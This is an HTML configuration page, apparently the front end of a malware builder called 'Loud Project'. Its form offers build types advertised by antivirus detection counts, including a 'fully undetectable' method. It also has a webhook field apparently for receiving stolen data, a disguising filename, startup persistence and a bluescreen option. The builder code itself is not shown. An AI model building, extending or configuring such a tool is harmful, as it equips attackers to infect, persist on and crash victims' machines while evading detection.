<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Application Configuration</title>
  <link rel="stylesheet" href="styles.css">
  <link rel="stylesheet" href="window.css"/>
</head>
<body>
  <header id="titlebar">
    <div id="drag-region">
        <div id="window-title">
            <span>Loud Project</span>
        </div>

        <div id="window-controls">

            <div class="button min-button" id="minimizeBtn">
                <img class="icon"
                    srcset="icons/min-w-10.png 1x, icons/min-w-12.png 1.25x, icons/min-w-15.png 1.5x, icons/min-w-15.png 1.75x, icons/min-w-20.png 2x, icons/min-w-20.png 2.25x, icons/min-w-24.png 2.5x, icons/min-w-30.png 3x, icons/min-w-30.png 3.5x"
                    draggable="false" />
            </div>
            <div class="button max-button" id="maxResBtn">
                <img class="icon"
                    srcset="icons/max-w-10.png 1x, icons/max-w-12.png 1.25x, icons/max-w-15.png 1.5x, icons/max-w-15.png 1.75x, icons/max-w-20.png 2x, icons/max-w-20.png 2.25x, icons/max-w-24.png 2.5x, icons/max-w-30.png 3x, icons/max-w-30.png 3.5x"
                    draggable="false" id="maxRes"/>
            </div>
            <div class="button close-button" id="closeBtn">
                <img class="icon"
                    srcset="icons/close-w-10.png 1x, icons/close-w-12.png 1.25x, icons/close-w-15.png 1.5x, icons/close-w-15.png 1.75x, icons/close-w-20.png 2x, icons/close-w-20.png 2.25x, icons/close-w-24.png 2.5x, icons/close-w-30.png 3x, icons/close-w-30.png 3.5x"
                    draggable="false" />
            </div>

        </div>
    </div>
</header>
  <h1>Configuration</h1>
  <form id="configForm">
    <label for="buildType">Build Type:</label>
    <select id="buildType" name="buildType">
      <option value="bun">Bun (0 detect)</option>
      <option value="pkg">Pkg (0-2 detect)</option>
      <option value="pkg-fud-method">Special Pkg (0 detect)</option>
    </select>

    <label for="webhook">Webhook:</label>
    <input type="text" id="webhook" name="webhook" value="webhook default">

    <label for="filename">Filename:</label>
    <input type="text" id="filename" name="filename" value="custom_app_name">

    <label>
      <input type="checkbox" id="startup" name="startup"> Startup
    </label>
    <label>
      <input type="checkbox" id="bluescreen" name="bluescreen"> Bluescreen
    </label>

    <button type="button" id="buildButton">BUILD</button>
    <p id="statusMessage"></p>
  </form>

  <div id="notification"></div>
  <footer id="credits">
    <p>Made with ❤️ by <a href="https://github.com/wompless" target="_blank">wompless</a></p>
</footer>
  <script src="renderer.js"></script>
  <script src="titleBar.js"></script>
</body>
</html>
